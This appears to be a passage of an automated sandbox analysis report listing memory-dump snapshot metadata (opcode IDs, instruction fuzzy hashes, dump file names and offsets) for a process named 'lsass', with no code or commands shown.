                                        • Opcode ID: 0ec489763a758f480f4c535443c53cbad224c0e703088abdd78df31be4c71c01
                                        • Instruction ID: f88874d5f4791eb1070106dd873ce68f503a4e198220fdcff643a24fefb0f946
                                        • Opcode Fuzzy Hash: 0ec489763a758f480f4c535443c53cbad224c0e703088abdd78df31be4c71c01
                                        • Instruction Fuzzy Hash: 36513670A0AB0A8FD369CF64D5B4571BBE5FF51304B51557EC48AC7AA2CB3AB842CB40
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3a1211ae5c2285f6506c42616a79bbec8b20b7095eb18a0503906d2c4dc36e5
                                        • Instruction ID: 3db39ccebad2f220578bd2f33c2599f1a40e0f4dfe877af33d993578df1d1878
                                        • Opcode Fuzzy Hash: f3a1211ae5c2285f6506c42616a79bbec8b20b7095eb18a0503906d2c4dc36e5
                                        • Instruction Fuzzy Hash: EC410630A1E86E8EEBB8CE588C706B877A1FF54314F1545B9C44ED71E6DD387A858780
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f6245c6d53f771bdeec7c90a3a961ee5657bce938a123120910d2cca9e56483c
                                        • Instruction ID: 6129ade46b3de4d677875558bd70af123c5920a248dd9bc0f77a25b186f1f8e2
                                        • Opcode Fuzzy Hash: f6245c6d53f771bdeec7c90a3a961ee5657bce938a123120910d2cca9e56483c
                                        • Instruction Fuzzy Hash: 57414471B0D9488FDF98EF28C4A59A4B7E1FB78324B04456AD44AC75A2DE21E845CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a94dafaf67fe5b92a526d994c26771b4badd7f5f294d9ab10c3f22edf1500535
                                        • Instruction ID: 6ac0fcc1bbbe14278b262255691ecd1bd219ea035c8ebcb172155566ee661dd5
                                        • Opcode Fuzzy Hash: a94dafaf67fe5b92a526d994c26771b4badd7f5f294d9ab10c3f22edf1500535
                                        • Instruction Fuzzy Hash: F941503260D9098FDF98EF18D465DA473E1FFA8320B0505AAE44EC7196DE25FC45CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9d091370a63e9ddccdef3bcc84e2246f8631f947ac58dd61b337335bc789f05
                                        • Instruction ID: 918b194f3042889a9ce48c94a3227d7132e632d2865588785767b1339879d820
                                        • Opcode Fuzzy Hash: f9d091370a63e9ddccdef3bcc84e2246f8631f947ac58dd61b337335bc789f05
                                        • Instruction Fuzzy Hash: 4D315E3260D9488FDF5CEF18C465EA473E1FFA9310B0506AEE45EC7196DE25E845CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c52a68b9d68affd7c2af645c2b9dee1a3b244ff4e2421a1816882d4806937754
                                        • Instruction ID: 57aaea844f98945e5c28fa0e902b4dbacd9453a5176a06a54cbd361022e192ef
                                        • Opcode Fuzzy Hash: c52a68b9d68affd7c2af645c2b9dee1a3b244ff4e2421a1816882d4806937754
                                        • Instruction Fuzzy Hash: 3D31867160C9488FDB98EF28C4A5DA477E1FF78324B0846ADD44AC75A2DE21F845CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17d97cf4d5499cf9a768fba0c50eb27965c237e82602ece4c3177e61bd6c1289
                                        • Instruction ID: 9dfff0f25abb073a2f1d6c24e7e1336136824c0324f50afe1082095a2ebf2377
                                        • Opcode Fuzzy Hash: 17d97cf4d5499cf9a768fba0c50eb27965c237e82602ece4c3177e61bd6c1289
                                        • Instruction Fuzzy Hash: 1631413260D9498FDF68EF18C465EA473E1FFA8710B0505AEE44EC7196DE25F885CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc758fd57ddfc1f1042fa601c594e538781a00464b902af4eb83d4e266abe4fc
                                        • Instruction ID: 42fd417d77cb6f652ec17d75603295f93a5c2c9fc1af12c12c0e1b7cf8f1934d
                                        • Opcode Fuzzy Hash: dc758fd57ddfc1f1042fa601c594e538781a00464b902af4eb83d4e266abe4fc
                                        • Instruction Fuzzy Hash: D5319371B0C9498FDB98EF28C4A5DA4B7E1FF78320B0406ADD44AC75A2DE25F845CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d994f1825e66aa1c7967559a8b335db8cb31a7c21990e254142a755b95d5aad
                                        • Instruction ID: 445d29f25ea83ddb46fc71ff95df0811bd19de3c7b5917f632af3510eeced3b6
                                        • Opcode Fuzzy Hash: 0d994f1825e66aa1c7967559a8b335db8cb31a7c21990e254142a755b95d5aad
                                        • Instruction Fuzzy Hash: A1317271B09A0E5BD754DEA8D4A29B8F7E5FF84314B114239D41ED3691DF24B912CB80
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a14bc2659f3904261ebc1a3299d36560aedc949a46add41c753434c52c85518c
                                        • Instruction ID: eaf7ecf8f8f708e2d78d61ba3390858b626b293fd36150bcc485da864f690ecb
                                        • Opcode Fuzzy Hash: a14bc2659f3904261ebc1a3299d36560aedc949a46add41c753434c52c85518c
                                        • Instruction Fuzzy Hash: 97316E70A1EA4ECFDBA8EF9484615BD77B8FF54701F51017AD00EC21A2DB3A6E448745
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 299c531da0289b92e2c4d3b481bd94a7714fae29817026c3468d1da32d597c31
                                        • Instruction ID: 301c629010ef2a17c7268dcb03a2fe908b08188e662c93c5fc8ce7231dce6b9c
                                        • Opcode Fuzzy Hash: 299c531da0289b92e2c4d3b481bd94a7714fae29817026c3468d1da32d597c31
                                        • Instruction Fuzzy Hash: 04212761B0E64D4FEB69A7E898622F8BBD8FF55314F15017DD04DD32E2DA1AA9068340
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06aaf398a37097e242a4bedf0f3adca6a36caab2a017acd911529f8d0967e231
                                        • Instruction ID: d5779e646208f80ea610f81898db4520580076f458b8d556c0193aae41735f2d
                                        • Opcode Fuzzy Hash: 06aaf398a37097e242a4bedf0f3adca6a36caab2a017acd911529f8d0967e231
                                        • Instruction Fuzzy Hash: 2D313A74A0991C9FDF98DB58C865AECB7B5FF59310F0002ADE04EE32A1CE35AA40CB41
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44db29ac3f17607f351c8a5528f571aaea279313c5665ea1f4ec7f1c7d00c830
                                        • Instruction ID: 93ea4a5b1af4f4519ee3d648a24d17ec001cdcfff7e9cc1d537b35fd0ff1bc67
                                        • Opcode Fuzzy Hash: 44db29ac3f17607f351c8a5528f571aaea279313c5665ea1f4ec7f1c7d00c830
                                        • Instruction Fuzzy Hash: EE311CB0A1E90ECFEBA8DB9484625BD76EDFF44301F51047AE41FD21A1DA3A6A409B41
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d420015f722772b00bb32e9f94ae5c8f0faace420246ea5242aefcd7d6e59dc1
                                        • Instruction ID: 87b41632c91e4056d1ddadf2b58e2913705614632f1e191147b227aeae8151e6
                                        • Opcode Fuzzy Hash: d420015f722772b00bb32e9f94ae5c8f0faace420246ea5242aefcd7d6e59dc1
                                        • Instruction Fuzzy Hash: 5F21E875A1991D8FDF98DF58C4A5AECB7B1FF98314F0141AED04EE32A1CA35AA41CB40
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 15a27ee4ba9616abd9656566aa565270ff697f233e224205219c1f8d2e3ae4a9
                                        • Instruction ID: bb8f1cc2f548ba8bf761ae596f648c49945b553171fabcd0ee7c13781be7b16d
                                        • Opcode Fuzzy Hash: 15a27ee4ba9616abd9656566aa565270ff697f233e224205219c1f8d2e3ae4a9
                                        • Instruction Fuzzy Hash: AB212B50A2E45F8BE338865848744B477BDEF50301B1985BDC44BCB4EBC92DBAC59381
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5641b36d584bf0908415f9703de8b2493836ca9f84ad869f3583b013f5890c52
                                        • Instruction ID: 43a0ad75c6292a8c0410512178bcf6d0a609864f92c5adfff7633a8a308eb563
                                        • Opcode Fuzzy Hash: 5641b36d584bf0908415f9703de8b2493836ca9f84ad869f3583b013f5890c52
                                        • Instruction Fuzzy Hash: F4213832B0D25D8FE732E7A89C250EC7B60EF42325F0541B3D5588B1D3DA382646CB85
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2269309be3e54af16f4090d2fd9ffecb5b0bd8ed14f84c07edee621db0db76e
                                        • Instruction ID: f66ec2e7d5e14ae53d9d34f79e11aaf0c5a3e88c1627f7144f103b6009c15f78
                                        • Opcode Fuzzy Hash: c2269309be3e54af16f4090d2fd9ffecb5b0bd8ed14f84c07edee621db0db76e
                                        • Instruction Fuzzy Hash: 23215075E1994ECFDB98DB98D8A09ECB7B5FF58300F11017AD00EE72A2DA296D05CB50
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8354f588be070df6dfa2fcb019d33367792fe9e4d7f83ad0dcf74ac57857586
                                        • Instruction ID: c685515c7cf8a0d5e5203f0b9b5e8a651c04c902f8ceb563da90258ba2de6ddd
                                        • Opcode Fuzzy Hash: b8354f588be070df6dfa2fcb019d33367792fe9e4d7f83ad0dcf74ac57857586
                                        • Instruction Fuzzy Hash: 7F01D63231890B8BD718CE58E8647E47790FF95359F60023EDA09C36E1D76AA665C7C0
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af7fb3b6fe045cb0f8259f81af8a072f88d0ff53f5ee8d42b4106c24cfcbb2e1
                                        • Instruction ID: b8d0ed39363f9f5b4a5a952d1c7294dcd34902a15698dd7a78770e6084e0c84c
                                        • Opcode Fuzzy Hash: af7fb3b6fe045cb0f8259f81af8a072f88d0ff53f5ee8d42b4106c24cfcbb2e1
                                        • Instruction Fuzzy Hash: EA018422F6F55F86F9785DD8E4313BC55027F44728F57227AE44E860E6DC4C2B8026C2
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09d265caa0775d3dc333a61829510a1ac668eb4dd7530f57218001817106ebca
                                        • Instruction ID: 5e3a708e9cb480f5a3d7b65063f254c82365aef838a31c01efea7d21afbf43ef
                                        • Opcode Fuzzy Hash: 09d265caa0775d3dc333a61829510a1ac668eb4dd7530f57218001817106ebca
                                        • Instruction Fuzzy Hash: 9501B531B19A5C4FDB58EFE898616ECB7A0FF4A318F11417EE14DD32E7DA2558128740
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e3f0cd1a77636b49d09f5a49fe0761dacb917b501cf8ecce9068e5cbcf00cea9
                                        • Instruction ID: 6423dcbd837ca7b4b7f1644419505993e6ede3fc8efeeb62af222d8f49fb8214
                                        • Opcode Fuzzy Hash: e3f0cd1a77636b49d09f5a49fe0761dacb917b501cf8ecce9068e5cbcf00cea9
                                        • Instruction Fuzzy Hash: 1E014B7094894C8FCFA8EB18C8A4BD877B4EBA9315F1401A9D40DE72A1DA31AAC0CB41
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 24915d2245d6da94463c3293378dff4acc8261436a349e17b3fe9854f33970ee
                                        • Instruction ID: 27cb7385b66855e5924f2c9490273bc342d44480eb9562d07e8259eba0aed267
                                        • Opcode Fuzzy Hash: 24915d2245d6da94463c3293378dff4acc8261436a349e17b3fe9854f33970ee
                                        • Instruction Fuzzy Hash: 2901E87094894C8FCF98EF58C8A9BD877B5EB68315F1401A9D40DE72A1DA319A85CB41
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 77f46da993afa4643ca86479ab5af907316d004d23875b9e2c4eb5709a56ca5b
                                        • Instruction ID: 129c1b58470733b070a9dafe293d1cf9d8e4d4077420e27dc59953dc2d0c92bf
                                        • Opcode Fuzzy Hash: 77f46da993afa4643ca86479ab5af907316d004d23875b9e2c4eb5709a56ca5b
                                        • Instruction Fuzzy Hash: C801283120D64A8FC71ADFA8D8B56E5BB90FF51324F14027ED505C76E1CB6A6654C7C0
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 611bd26d6ab4ab831f0c35118a15265da753d2fabbf034af2387fe41706da087
                                        • Instruction ID: 5070d1e6b2dcae76a094dc5e8946e8e1eca50149055df94663671a39818a4809
                                        • Opcode Fuzzy Hash: 611bd26d6ab4ab831f0c35118a15265da753d2fabbf034af2387fe41706da087
                                        • Instruction Fuzzy Hash: 54F0967154F3C9AFD7228BB088215D93FB8EF43214B1A00F6D495CB0B2C56D5B46C762
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 98428cf9bb6b14e7463d23abe08e582322e34961e14c81e59f63ccb8c21311eb
                                        • Instruction ID: 73b4a86db88f93d01207d3ab1dfbe9c691276ab681852a2c59d29c007ba69ee6
                                        • Opcode Fuzzy Hash: 98428cf9bb6b14e7463d23abe08e582322e34961e14c81e59f63ccb8c21311eb
                                        • Instruction Fuzzy Hash: 94D05E3491E28CDADB31EF9088210FE7B60FF40308F1041A6EA09121E0DB7427189682
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
                                        • Instruction ID: 5c3836401fa5f36ba66d385df7dbf7d4ed3a959fc71f56cc2a164d6d90b52acd
                                        • Opcode Fuzzy Hash: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
                                        • Instruction Fuzzy Hash: 08D0C994B0F65F85F13B4AC1407023951AC5F41700E22413DD06F418F1DD1F7B016211
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3d3b0c94419f0aa7a1afebc210b4fd077754abe23724b7e3fc0e42bddc3ecf3
                                        • Instruction ID: 2c63116c29afb7c3fcb5a49dbd375b9c507fc5531fa348240ab973c29507fda7
                                        • Opcode Fuzzy Hash: f3d3b0c94419f0aa7a1afebc210b4fd077754abe23724b7e3fc0e42bddc3ecf3
                                        • Instruction Fuzzy Hash: EED0C996B0F91F85F1384EC7807023925917F06308E22203EE19F938E5CD1C7B026245
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b273a1a08826d1b8bc1d61c548047a97ae9cd01490883ee88b36607296e47a
                                        • Instruction ID: 99eb50241774fa0f1a380ac81c14ae6db354a47fe7c29509fe0d03335d3c4524
                                        • Opcode Fuzzy Hash: 23b273a1a08826d1b8bc1d61c548047a97ae9cd01490883ee88b36607296e47a
                                        • Instruction Fuzzy Hash: 0CC08C20A0E28B8FF2374B948035235376CAF42300F2340B9C40E4A8F6CE2A3B019321
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2276819634.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9120d7d5d510d60ddd58d7ec11383884db066a8e4b3a30c3828bebc2efdefe9d
                                        • Instruction ID: 3c6ca6db2bb23bad56b9c5541718cc6c178af57e2016516e12501095d08f1f63
                                        • Opcode Fuzzy Hash: 9120d7d5d510d60ddd58d7ec11383884db066a8e4b3a30c3828bebc2efdefe9d
                                        • Instruction Fuzzy Hash: 35C04C80F0E34A66E63515E005A107D07881B16644B5615B1D546651E3E84D6A055611
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BB14000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB14000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bb14000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 76afa6dac159f58b6de6f1bd13b16a61611529bb6eaf91ab1794fcb2a5f4d684
                                        • Instruction ID: 28ac9d4d89a9889fb72dc93725966bfe67e3fa506c9594b2d613e1c6538f85df
                                        • Opcode Fuzzy Hash: 76afa6dac159f58b6de6f1bd13b16a61611529bb6eaf91ab1794fcb2a5f4d684
                                        • Instruction Fuzzy Hash: C0B01201F0F20F87F13018F0087007C00402B0434CE125931E20B451F7DC8C3A005190